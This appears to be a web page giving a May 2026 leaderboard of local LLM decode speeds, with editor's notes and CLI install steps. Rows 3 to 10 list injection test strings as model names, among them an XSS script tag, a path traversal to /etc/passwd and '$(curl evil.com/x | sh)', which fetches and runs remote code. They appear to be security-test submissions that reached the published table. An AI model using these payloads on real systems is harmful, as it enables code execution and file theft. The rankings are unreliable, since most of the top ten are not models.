State of the local LLM — May 2026
The canonical answer to “what’s the fastest local LLM right now” as of May 2026, measured under llm-speed suite-v1. Numbers are wall-clock decode tok/s on the highest-decode workload that successfully ran. Every cell links to the run that produced it.
Headline cells
Top 10 decode tok/s — May 2026
| # | Model | Hardware | Backend | Decode tok/s | Run |
|---|---|---|---|---|---|
| 1 | Qwen3-Next-80B-A3B-Instruct-MLX-4bit | M3 Ultra (60-core GPU) + 96GB unified | mlx | 80.3 | r_1pl79r50ofy |
| 2 | Qwen3.6-27B-Q4_K_M.gguf | RTX 5090 (32GB) + AMD Ryzen 7 9850X3D 8-Core Processor (8c) + 30GB | llama.cpp | 69.9 | r_bqsunbd6xa8 |
| 3 | <script>alert(1)</script> | Pentest-Bench | llama.cpp | 42.0 | r_a3ei8og3rkg |
| 4 | victim | Pentest-Bench | llama.cpp | 42.0 | r_b-ndu-9uswz |
| 5 | actual-name | Pentest-Bench | llama.cpp | 42.0 | r_0heij9dzacw |
| 6 | beforeafter | Pentest-Bench | llama.cpp | 42.0 | r__zyiw9l3_c5 |
| 7 | xy | Pentest-Bench | llama.cpp | 42.0 | r_2nqkbpdq-dk |
| 8 | a/b/../../etc/passwd | Pentest-Bench | llama.cpp | 42.0 | r_8zc2yi4had5 |
| 9 | $(curl evil.com/x | sh) | Pentest-Bench | llama.cpp | 42.0 | r_kkseorkbdk3 |
| 10 | innocent/bin/sh | Pentest-Bench | llama.cpp | 42.0 | r_0laxq0naoht |
Editor’s notes
Inaugural issue. Numbers below are the canonical answer to "what's the fastest local LLM right now" measured under suite-v1, with the dual-domain trust chain in place (CDN sha256 + GitHub Releases mirror). Coding-agent and 70B-class headlines come from MLX on M3 Ultra and llama.cpp on RTX 5090 respectively. Future issues will add a delta column showing how each headline moved month-over-month.
26 runs landed in May 2026. To reproduce any number on this page, install the CLI and run the suite on the same model + hardware:
pipx install https://llm-speed.com/dist/llm_speed-0.0.1-py3-none-any.whl
llm-speed verify
llm-speed benchMethodology: /methodology · Privacy: /privacy · Source: github.com/meadow-kun/llm-speed